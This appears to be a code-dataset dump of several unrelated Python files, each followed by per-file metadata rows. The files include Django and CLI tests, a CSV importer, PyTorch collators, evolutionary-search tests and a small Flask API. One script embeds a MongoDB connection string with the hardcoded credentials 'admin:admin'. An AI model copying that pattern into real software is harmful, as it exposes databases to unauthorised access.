"""Test cannot add existing office floor section name"""
self.assertEqual(self.all_office_floor_sections.count(), 1)
with transaction.atomic():
with self.assertRaises(ValidationError):
new_office_floor_section = OfficeFloorSection(
name="Right Wing",
floor=self.office_floor
)
new_office_floor_section.save()
self.assertEqual(self.all_office_floor_sections.count(), 1)
def test_office_block_model_string_representation(self):
self.assertEqual(str(self.office_block), "Block A")
def test_office_floor_model_string_representation(self):
self.assertEqual(self.office_floor.number, 5)
def test_office_floor_section_model_string_representation(self):
self.assertEqual(str(self.office_floor_section), "Right Wing")
| 37.484536
| 73
| 0.668592
| 3,365
| 0.925468
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.103685
|
9fdf686d8f768389a99935e8b0188491d6cb098b
| 2,481
|
py
|
Python
|
tests/functional/collection/test_collection_show.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 47
|
2016-04-21T19:51:17.000Z
|
2022-02-25T14:13:30.000Z
|
tests/functional/collection/test_collection_show.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 421
|
2016-04-20T18:45:24.000Z
|
2022-03-14T14:50:41.000Z
|
tests/functional/collection/test_collection_show.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 20
|
2016-09-10T20:25:27.000Z
|
2021-10-06T16:02:47.000Z
|
import pytest
def test_collection_show(run_line, load_api_fixtures, add_gcs_login):
data = load_api_fixtures("collection_operations.yaml")
cid = data["metadata"]["mapped_collection_id"]
username = data["metadata"]["username"]
epid = data["metadata"]["endpoint_id"]
add_gcs_login(epid)
_result, matcher = run_line(f"globus collection show {cid}", matcher=True)
matcher.check(r"^Display Name:\s+(.*)$", groups=["Happy Fun Collection Name"])
matcher.check(r"^Owner:\s+(.*)$", groups=[username])
matcher.check(r"^ID:\s+(.*)$", groups=[cid])
matcher.check(r"^Collection Type:\s+(.*)$", groups=["mapped"])
matcher.check(r"^Connector:\s+(.*)$", groups=["POSIX"])
def test_collection_show_private_policies(run_line, load_api_fixtures, add_gcs_login):
data = load_api_fixtures("collection_show_private_policies.yaml")
cid = data["metadata"]["collection_id"]
username = data["metadata"]["username"]
epid = data["metadata"]["endpoint_id"]
add_gcs_login(epid)
_result, matcher = run_line(
f"globus collection show --include-private-policies {cid}", matcher=True
)
matcher.check(r"^Display Name:\s+(.*)$", groups=["Happy Fun Collection Name"])
matcher.check(r"^Owner:\s+(.*)$", groups=[username])
matcher.check(r"^ID:\s+(.*)$", groups=[cid])
matcher.check(r"^Collection Type:\s+(.*)$", groups=["mapped"])
matcher.check(r"^Connector:\s+(.*)$", groups=["POSIX"])
matcher.check(r"Root Path:\s+(.*)$", groups=["/"])
matcher.check(
r"^Sharing Path Restrictions:\s+(.*)$",
groups=[
'{"DATA_TYPE": "path_restrictions#1.0.0", "none": ["/"], "read": ["/projects"], "read_write": ["$HOME"]}', # noqa: E501
],
)
@pytest.mark.parametrize(
"epid_key, ep_type",
[
("gcp_endpoint_id", "Globus Connect Personal"),
("endpoint_id", "Globus Connect Server v5 Endpoint"),
],
)
def test_collection_show_on_non_collection(
run_line, load_api_fixtures, epid_key, ep_type
):
data = load_api_fixtures("collection_operations.yaml")
epid = data["metadata"][epid_key]
result = run_line(f"globus collection show {epid}", assert_exit_code=3)
assert (
f"Expected {epid} to be a collection ID.\n"
f"Instead, found it was of type '{ep_type}'."
) in result.stderr
assert (
"Please run the following command instead:\n\n"
f" globus endpoint show {epid}"
) in result.stderr
| 36.485294
| 132
| 0.639258
| 0
| 0
| 0
| 0
| 732
| 0.295042
| 0
| 0
| 1,126
| 0.453849
|
9fdfc62d17a4273e27c2f11b9b40558a4ec8fe41
| 2,044
|
py
|
Python
|
job.py
|
mapledyne/ihunttools
|
28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8
|
[
"MIT"
] | null | null | null |
job.py
|
mapledyne/ihunttools
|
28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8
|
[
"MIT"
] | 2
|
2021-09-08T02:16:00.000Z
|
2022-01-13T02:57:26.000Z
|
job.py
|
mapledyne/ihunttools
|
28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8
|
[
"MIT"
] | null | null | null |
import argparse
import random
import ihuntapp
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Build an #iHunt job app page.')
parser.add_argument('--name', "-n",
default="Unnamed job", help='Name of the job')
parser.add_argument('--description', "-d",
default="No description available", help='Description of the job')
parser.add_argument('--image', "-i",
type=str, default="", help='Job image', required=True)
parser.add_argument('--price', "-p",
default=(random.randint(1, 18) * 500), help='Price the job pays')
parser.add_argument('--stars', "-s",
type=float, default=(random.randint(3, 8) * 0.5), help='Star level of job')
parser.add_argument('--currency', default="$", help='Currency symbol')
parser.add_argument('--distance',
type=float, default=random.uniform(5, 25), help='Distance of job')
parser.add_argument('--distanceunit', default="miles", help='distance unit')
parser.add_argument('--time', "-t",
type=float, default=random.randint(1, 3), help='Time of post')
parser.add_argument('--timeunit', default="days", help='Time unit')
parser.add_argument('--remaining', "-r",
type=float, default=random.randint(3, 8), help='Time of post')
parser.add_argument('--remainingunit', default="days", help='Time unit')
parser.add_argument('--output', '-o', default='job.png', help='Filename to save screenshot')
args = parser.parse_args()
phone = ihuntapp.iHuntApp(args.name, args.description, args.image)
phone.price = args.price
phone.stars = args.stars
phone.currency = args.currency
phone.distance = args.distance
phone.distanceunit = args.distanceunit
phone.time = args.time
phone.timeunit = args.timeunit
phone.remaining = args.remaining
phone.remainingunit = args.remainingunit
phone.screenshot(args.output)
| 44.434783
| 99
| 0.626223
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 514
| 0.251468
|
9fe154537630b5423fecebdaa0e5bc8b96aff771
| 4,945
|
py
|
Python
|
category_import.py
|
iankigen/art-backend
|
e46f8e1a530ae56b6a236af4ff686ca4e0dd6630
|
[
"MIT"
] | null | null | null |
category_import.py
|
iankigen/art-backend
|
e46f8e1a530ae56b6a236af4ff686ca4e0dd6630
|
[
"MIT"
] | null | null | null |
category_import.py
|
iankigen/art-backend
|
e46f8e1a530ae56b6a236af4ff686ca4e0dd6630
|
[
"MIT"
] | null | null | null |
import sys
import os
import csv
from tqdm import tqdm
import django
from import_util import display_inserted, display_skipped
project_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(project_dir)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
django.setup()
from core.models.asset import AssetCategory, AssetSubCategory # noqa
def load_csv_file(file_name): # noqa
print('\n')
if os.path.isfile(file_name):
if not file_name.endswith('.csv'):
return 'File not supported'
else:
with open(file_name, 'r', ) as f:
file_length = len(f.readlines()) - 1
f.seek(0)
skipped = dict()
inserted_records = []
data = csv.DictReader(f, delimiter=',')
counter = 1
with tqdm(total=file_length) as pbar:
for row in data:
assets_category = AssetCategory.objects.\
filter(category_name=row['Category']).exists()
assets_sub_category = AssetSubCategory.objects.\
filter(sub_category_name=row['Sub Category']).\
exists()
if assets_category:
if assets_sub_category:
skipped[row['Category']] = [(
'Category {0} already exists'.
format(row['Category'])), counter]
skipped[row['Sub Category']] = [(
'Sub Category {0} already exists'.
format(row['Sub Category'])), counter]
else:
category = AssetCategory.objects.get(
category_name=row['Category']
)
assets_sub_category = AssetSubCategory.\
objects.create(
sub_category_name=row['Sub Category'],
asset_category=category
)
assets_sub_category.save()
inserted_records.append([
assets_sub_category,
counter]
)
skipped[row['Category']] = [(
'Category {0} already exists'.
format(row['Category'])), counter]
elif not assets_category:
if assets_sub_category:
asset_category = AssetCategory.objects.create(
category_name=row['Category']
)
asset_category.save()
inserted_records.append([
asset_category,
counter]
)
skipped[row['Sub Category']] = [(
'Sub Category {0} already exists'.
format(row['Sub Category'])), counter]
else:
asset_category = AssetCategory.objects.create(
category_name=row['Category']
)
asset_category.save()
category = AssetCategory.objects.get(
category_name=row['Category']
)
sub_category = AssetSubCategory.objects.create(
sub_category_name=row['Sub Category'],
asset_category=category
)
sub_category.save()
inserted_records.append([
asset_category,
counter]
)
inserted_records.append([
sub_category,
counter]
)
counter += 1
pbar.update(1)
print("\n")
display_inserted(inserted_records)
display_skipped(skipped)
return 'File not found'
if __name__ == '__main__':
print('********* Import the csv file ********')
input_file = input('Import the file: ')
load_csv_file(input_file) # noqa
| 44.151786
| 79
| 0.394944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 489
| 0.098888
|
9fe1fc1239cc234d72923d2663fd719390f1395d
| 454
|
py
|
Python
|
epochbot/utils.py
|
jaloo555/solana-easy-py
|
8e28b8de52fbe4ee0b8e94a0f9c728114fc91728
|
[
"MIT"
] | 4
|
2021-09-10T19:20:42.000Z
|
2022-02-12T00:27:40.000Z
|
epochbot/utils.py
|
jaloo555/solana-easy-py
|
8e28b8de52fbe4ee0b8e94a0f9c728114fc91728
|
[
"MIT"
] | null | null | null |
epochbot/utils.py
|
jaloo555/solana-easy-py
|
8e28b8de52fbe4ee0b8e94a0f9c728114fc91728
|
[
"MIT"
] | 1
|
2021-11-08T15:32:46.000Z
|
2021-11-08T15:32:46.000Z
|
def enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
return type('Enum', (), enums)
ENDPOINT_URLS_ENUM = enum(
MAIN='https://api.mainnet-beta.solana.com',
DEV='https://api.devnet.solana.com',
TEST='https://api.testnet.solana.com',
)
ENDPOINT_URLS = {
"MAIN":'https://api.mainnet-beta.solana.com',
"DEV":'https://api.devnet.solana.com',
"TEST":'https://api.testnet.solana.com',
}
| 30.266667
| 66
| 0.645374
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 223
| 0.491189
|
9fe207c6dcc8198ff87d2e16175a87d21e6112ea
| 812
|
py
|
Python
|
FrontEnd/mapa_pontos.py
|
JessicaIsri/WebBot
|
e9ed911c0306f5e362b577e244e50073336480ea
|
[
"bzip2-1.0.6"
] | null | null | null |
FrontEnd/mapa_pontos.py
|
JessicaIsri/WebBot
|
e9ed911c0306f5e362b577e244e50073336480ea
|
[
"bzip2-1.0.6"
] | 1
|
2021-11-13T10:12:49.000Z
|
2021-11-16T12:17:01.000Z
|
FrontEnd/mapa_pontos.py
|
JessicaIsri/WebBot
|
e9ed911c0306f5e362b577e244e50073336480ea
|
[
"bzip2-1.0.6"
] | null | null | null |
import pymongo
import folium
from pymongo import MongoClient
db = MongoClient('mongodb+srv://admin:admin@cluster0-vuh1j.azure.mongodb.net/test?retryWrites=true&w=majority')
db = db.get_database('BD_EMPRESAS')
collection = db.empresas
cnpj = []
latitude = []
longitude = []
qtd_range = []
endereco = []
cnpj = db.get_collection('empresas').distinct("cnpj")
latitude = db.get_collection('empresas').distinct("latitude")
qtd_range = len(latitude)
longitude = db.get_collection('empresas').distinct("longitude")
endereco = db.get_collection('empresas').distinct("endereco")
mapa = folium.Map(location=[-23.4795233,-46.2698754],zoom_start=9)
for i in range(qtd_range):
folium.Marker([latitude[i], longitude[i]], popup='CNPJ: '+cnpj[i]+'\n Endereco: '+endereco[i]).add_to(mapa)
mapa.save("index.html")
| 24.606061
| 111
| 0.730296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 218
| 0.268473
|
9fe282030a02b4055f9395a841b3fabbcbf1b05f
| 835
|
py
|
Python
|
tests/test_BG_IO.py
|
GeorgRamer/anasys-python-tools
|
f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa
|
[
"MIT"
] | null | null | null |
tests/test_BG_IO.py
|
GeorgRamer/anasys-python-tools
|
f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa
|
[
"MIT"
] | null | null | null |
tests/test_BG_IO.py
|
GeorgRamer/anasys-python-tools
|
f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa
|
[
"MIT"
] | null | null | null |
import anasyspythontools as apt
import pytest
import glob
import os
TESTFOLDER = os.path.join(os.path.dirname(__file__),"test data")
@pytest.mark.parametrize("filename", glob.glob(os.path.join(TESTFOLDER, "*.irb")))
class TestBG:
def setup_method(self, filename):
pass
def teardown_method(self):
pass
def test_basic_read(self, filename):
f = apt.read(filename)
assert f is not None
assert isinstance(f, apt.irspectra.Background)
def test_basic_read(self, filename):
f = apt.read(filename)
def test_check_equality(self, filename):
assert apt.read(filename) == apt.read(filename)
def test_check_attributes(self, filename):
f = apt.read(filename)
assert hasattr(f,"wn")
assert hasattr(f,"signal")
| 23.194444
| 83
| 0.646707
| 611
| 0.731737
| 0
| 0
| 695
| 0.832335
| 0
| 0
| 40
| 0.047904
|
9fe2e87d337b6c88bd8c4467d12c5b714809bf62
| 1,015
|
py
|
Python
|
afpy/yml.py
|
fordaj/afpy
|
4fca208a186d276a28e7911210cedb02033237b0
|
[
"MIT"
] | null | null | null |
afpy/yml.py
|
fordaj/afpy
|
4fca208a186d276a28e7911210cedb02033237b0
|
[
"MIT"
] | null | null | null |
afpy/yml.py
|
fordaj/afpy
|
4fca208a186d276a28e7911210cedb02033237b0
|
[
"MIT"
] | null | null | null |
import yaml
from yaml import Loader, Dumper
from .pathify import *
class yml:
def __init__(self):
pass
def dump(self,
data,
path : str
):
'''Dumps incoming python data into a YAML file at `path`.
-----
* `data` (dict,list,tuple) : Any YAML dump friendly python data structure.
* `path` (str) : Path to YAML output file.
'''
with open(path, "w") as output_file:
yaml.dump(data, output_file, Dumper=yaml.Dumper)
def load(self,
path : str
):
'''Loads YAML data from a file at the provided path.
-----
* `path` (str) : Path to YAML file.
* `return` (dict,list,tuple) : Returns a python data structure.
'''
path = pathify(path)
with open(path,'r') as input_file:
return yaml.load(input_file, Loader=yaml.Loader)
| 30.757576
| 86
| 0.487685
| 945
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 475
| 0.46798
|
9fe326bc9f4e12d04244fe6f4b5e92ea0f66a315
| 88
|
py
|
Python
|
Algorithm/__init__.py
|
DSC-Bennett-University/AI-ML-Starter
|
5dc411c686a703c37eaf7e88db184cb8972ad2d1
|
[
"MIT"
] | 1
|
2021-10-01T05:54:02.000Z
|
2021-10-01T05:54:02.000Z
|
Algorithm/__init__.py
|
DSC-Bennett-University/AI-ML-Starter
|
5dc411c686a703c37eaf7e88db184cb8972ad2d1
|
[
"MIT"
] | 7
|
2021-09-21T11:38:50.000Z
|
2021-10-06T10:28:11.000Z
|
Algorithm/__init__.py
|
DSC-Bennett-University/AI-ML-Starter
|
5dc411c686a703c37eaf7e88db184cb8972ad2d1
|
[
"MIT"
] | 4
|
2021-09-21T12:08:05.000Z
|
2021-10-01T05:54:08.000Z
|
from .template import template
from .tools import tools
from .LinearReg import LinearReg
| 29.333333
| 32
| 0.840909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
9fe3746b0ca2a17a4da60916603ceccce096325e
| 6,994
|
py
|
Python
|
hypernets/tests/searchers/evolution_test.py
|
Enpen/Hypernets
|
5fbf01412ffaef310855d98f52f8cc169e96246b
|
[
"Apache-2.0"
] | 1,080
|
2020-06-22T07:44:22.000Z
|
2022-03-22T07:46:48.000Z
|
hypernets/tests/searchers/evolution_test.py
|
Enpen/Hypernets
|
5fbf01412ffaef310855d98f52f8cc169e96246b
|
[
"Apache-2.0"
] | 24
|
2020-08-06T02:06:37.000Z
|
2022-03-31T03:34:35.000Z
|
hypernets/tests/searchers/evolution_test.py
|
Enpen/Hypernets
|
5fbf01412ffaef310855d98f52f8cc169e96246b
|
[
"Apache-2.0"
] | 170
|
2020-08-14T08:39:18.000Z
|
2022-03-23T12:58:17.000Z
|
# -*- coding:utf-8 -*-
"""
"""
import numpy as np
from hypernets.core.ops import Identity
from hypernets.core.search_space import HyperSpace, Int, Real, Choice, Bool
from hypernets.core.searcher import OptimizeDirection
from hypernets.searchers.evolution_searcher import Population, EvolutionSearcher
def get_space():
space = HyperSpace()
with space.as_default():
p1 = Int(1, 100)
p2 = Choice(['a', 'b'])
p3 = Bool()
p4 = Real(0.0, 1.0)
id1 = Identity(p1=p1)
id2 = Identity(p2=p2)(id1)
id3 = Identity(p3=p3)(id2)
id4 = Identity(p4=p4)(id3)
return space
class Test_Evolution():
def test_population(self):
population = Population(optimize_direction=OptimizeDirection.Maximize, random_state=np.random.RandomState(9527))
population.append('a', 0)
population.append('b', 1)
population.append('c', 2)
population.append('d', 3)
population.append('e', 4)
population.append('f', 5)
population.append('g', 6)
population.append('h', 7)
population.append('i', 8)
population.append('i', 9)
b1 = population.sample_best(25)
assert b1.reward == 8
population = Population(optimize_direction=OptimizeDirection.Minimize, random_state=np.random.RandomState(9527))
population.append('a', 0)
population.append('b', 1)
population.append('c', 2)
population.append('d', 3)
population.append('e', 4)
population.append('f', 5)
population.append('g', 6)
population.append('h', 7)
population.append('i', 8)
population.append('i', 9)
b2 = population.sample_best(25)
assert b2.reward == 0
def test_eliminate(self):
population = Population(optimize_direction=OptimizeDirection.Maximize)
population.append('a', 4)
population.append('b', 3)
population.append('c', 2)
population.append('d', 1)
population.append('e', 0)
population.append('f', 5)
population.append('g', 6)
population.append('h', 7)
population.append('i', 8)
population.append('j', 9)
eliminates = population.eliminate(2, regularized=True)
assert eliminates[0].space_sample == 'a' and eliminates[1].space_sample == 'b'
eliminates = population.eliminate(2, regularized=False)
assert eliminates[0].space_sample == 'e' and eliminates[1].space_sample == 'd'
def test_mutate(self):
def get_space():
space = HyperSpace()
with space.as_default():
id1 = Identity(p1=Int(0, 10), p2=Choice(['a', 'b']))
id2 = Identity(p3=Real(0., 1.), p4=Bool())(id1)
return space
# population = Population(optimize_direction=OptimizeDirection.Maximize)
population = Population(optimize_direction='max')
space1 = get_space()
space1.random_sample()
assert space1.all_assigned
space2 = get_space()
assert not space2.all_assigned
new_space = population.mutate(space1, space2)
pv1 = list(space1.get_assigned_param_values().values())
pv2 = list(space2.get_assigned_param_values().values())
assert space2.all_assigned
assert new_space.all_assigned
assert np.sum([v1 != v2 for v1, v2 in zip(pv1, pv2)]) == 1
def test_set_random_state(self):
from hypernets.core import set_random_state
set_random_state(9527)
searcher = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
vectors = []
for i in range(1, 10):
vectors.append(searcher.sample().vectors)
assert vectors == [[98, 0, 0, 0.96], [9, 0, 0, 0.93], [60, 0, 1, 0.24], [54, 0, 1, 0.7],
[25, 0, 1, 0.73], [67, 1, 1, 0.43], [57, 1, 1, 0.05], [49, 0, 0, 0.71], [71, 1, 1, 0.49]]
set_random_state(None)
searcher = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
vectors = []
for i in range(1, 10):
vectors.append(searcher.sample().vectors)
assert vectors != [[98, 0, 0, 0.96], [9, 0, 0, 0.93], [60, 0, 1, 0.24], [54, 0, 1, 0.7],
[25, 0, 1, 0.73], [67, 1, 1, 0.43], [57, 1, 1, 0.05], [49, 0, 0, 0.71], [71, 1, 1, 0.49]]
set_random_state(9527)
searcher = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
vectors = []
for i in range(1, 10):
vectors.append(searcher.sample().vectors)
assert vectors == [[98, 0, 0, 0.96], [9, 0, 0, 0.93], [60, 0, 1, 0.24], [54, 0, 1, 0.7],
[25, 0, 1, 0.73], [67, 1, 1, 0.43], [57, 1, 1, 0.05], [49, 0, 0, 0.71], [71, 1, 1, 0.49]]
set_random_state(1)
searcher = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
vectors = []
for i in range(1, 10):
vectors.append(searcher.sample().vectors)
assert vectors == [[38, 1, 0, 0.93], [10, 1, 1, 0.15], [17, 1, 0, 0.39], [7, 1, 0, 0.85], [19, 0, 1, 0.44],
[29, 1, 0, 0.67], [88, 1, 1, 0.43], [95, 0, 0, 0.8], [10, 1, 1, 0.09]]
set_random_state(None)
# def test_searcher_with_hp(self):
# def get_space():
# space = HyperSpace()
# with space.as_default():
# in1 = Input(shape=(10,))
# in2 = Input(shape=(20,))
# in3 = Input(shape=(1,))
# concat = Concatenate()([in1, in2, in3])
# dense1 = Dense(10, activation=Choice(['relu', 'tanh', None]), use_bias=Bool())(concat)
# bn1 = BatchNormalization()(dense1)
# dropout1 = Dropout(Choice([0.3, 0.4, 0.5]))(bn1)
# output = Dense(2, activation='softmax', use_bias=True)(dropout1)
# return space
#
# rs = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
# hk = HyperKeras(rs, optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'],
# callbacks=[SummaryCallback()])
#
# x1 = np.random.randint(0, 10000, size=(100, 10))
# x2 = np.random.randint(0, 100, size=(100, 20))
# x3 = np.random.normal(1.0, 100.0, size=(100))
# y = np.random.randint(0, 2, size=(100), dtype='int')
# x = [x1, x2, x3]
#
# hk.search(x, y, x, y, max_trials=10)
# assert hk.get_best_trial()
# best_trial = hk.get_best_trial()
#
# estimator = hk.final_train(best_trial.space_sample, x, y)
# score = estimator.predict(x)
# result = estimator.evaluate(x, y)
# assert len(score) == 100
# assert result
| 39.965714
| 120
| 0.570489
| 6,358
| 0.909065
| 0
| 0
| 0
| 0
| 0
| 0
| 1,623
| 0.232056
|
9fe3efc076ac50b9a73eb652fb87630b07aba672
| 286
|
py
|
Python
|
backend/api/api.py
|
iamdempa/react-flask-postgres-boilerplate-with-docker
|
f1d74dfa08777ff2aeef3ed2620087855d6e30c3
|
[
"Apache-2.0"
] | 67
|
2018-10-02T04:04:15.000Z
|
2022-03-30T17:43:56.000Z
|
backend/api/api.py
|
iamdempa/react-flask-postgres-boilerplate-with-docker
|
f1d74dfa08777ff2aeef3ed2620087855d6e30c3
|
[
"Apache-2.0"
] | null | null | null |
backend/api/api.py
|
iamdempa/react-flask-postgres-boilerplate-with-docker
|
f1d74dfa08777ff2aeef3ed2620087855d6e30c3
|
[
"Apache-2.0"
] | 30
|
2018-11-21T22:55:08.000Z
|
2022-03-01T16:55:53.000Z
|
from flask import jsonify
from flask_restful import Resource, Api
from .models import Player as PlayerModel, to_dict
api = Api()
class Player(Resource):
def get(self):
return jsonify([to_dict(player) for player in PlayerModel.query.all()])
api.add_resource(Player, '/')
| 22
| 79
| 0.734266
| 122
| 0.426573
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.01049
|
9fe5a28b405ba0411a5720a42bbe49f07b08a96f
| 8,697
|
py
|
Python
|
core/data/collators.py
|
manzar96/st7
|
8dac6fa3497e5a3594766a232a9e8436120e9563
|
[
"MIT"
] | null | null | null |
core/data/collators.py
|
manzar96/st7
|
8dac6fa3497e5a3594766a232a9e8436120e9563
|
[
"MIT"
] | null | null | null |
core/data/collators.py
|
manzar96/st7
|
8dac6fa3497e5a3594766a232a9e8436120e9563
|
[
"MIT"
] | null | null | null |
import torch
from torch.nn.utils.rnn import pad_sequence, pack_padded_sequence
from core.utils.masks import pad_mask, subsequent_mask
from core.utils.tensors import mktensor
class Task71aCollator(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, is_humor = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
is_humor = mktensor(is_humor, dtype=torch.long)
return padded_inputs,inputs_pad_mask, is_humor
class Task71aCollatorTest(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, is_humor = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
return myid, padded_inputs, inputs_pad_mask
class Task71aCollatorFeatures(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, is_humor = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
is_humor = mktensor(is_humor, dtype=torch.long)
return myid, padded_inputs,inputs_pad_mask, is_humor
class ShortTextDatasetCollator(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
text_input, is_humor = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
is_humor = mktensor(is_humor, dtype=torch.long)
return padded_inputs,inputs_pad_mask, is_humor
class Task723Collator(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, humor_rating,humor_contr = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
humor_rating = mktensor(humor_rating, dtype=torch.float)
humor_contr = mktensor(humor_contr, dtype=torch.long)
return padded_inputs,inputs_pad_mask, humor_rating, humor_contr
class Task723CollatorTest(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, humor_rat, humor_contr = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
return myid, padded_inputs, inputs_pad_mask
class Task723CollatorFeatures(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, humor_rating,humor_contr = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
humor_rating = mktensor(humor_rating, dtype=torch.float)
humor_contr = mktensor(humor_contr, dtype=torch.long)
return myid, padded_inputs,inputs_pad_mask, humor_rating, humor_contr
class Task74Collator(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, off = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
off = mktensor(off, dtype=torch.float)
return padded_inputs,inputs_pad_mask, off
class Task74CollatorTest(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, off = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
return myid, padded_inputs, inputs_pad_mask
class Task74CollatorFeatures(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, off = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
off = mktensor(off, dtype=torch.float)
return myid, padded_inputs, inputs_pad_mask,off
| 33.321839
| 77
| 0.609176
| 8,493
| 0.976544
| 0
| 0
| 0
| 0
| 0
| 0
| 450
| 0.051742
|
9fe62e0a759bb38c6001a97c2d2f6695ebbb34cb
| 22,748
|
py
|
Python
|
tests/filesystem_tests.py
|
d-kiss/fakeos
|
88dff667830efe10841df8b3a5f33a581bd94b69
|
[
"MIT"
] | 1
|
2017-10-09T10:59:43.000Z
|
2017-10-09T10:59:43.000Z
|
tests/filesystem_tests.py
|
d-kiss/fakeos
|
88dff667830efe10841df8b3a5f33a581bd94b69
|
[
"MIT"
] | 5
|
2017-10-06T17:33:37.000Z
|
2017-10-13T16:31:34.000Z
|
tests/filesystem_tests.py
|
rinslow/fakeos
|
88dff667830efe10841df8b3a5f33a581bd94b69
|
[
"MIT"
] | null | null | null |
import operator
import os as _os
from pathlib import Path
from string import ascii_letters
from itertools import chain, permutations
from functools import reduce
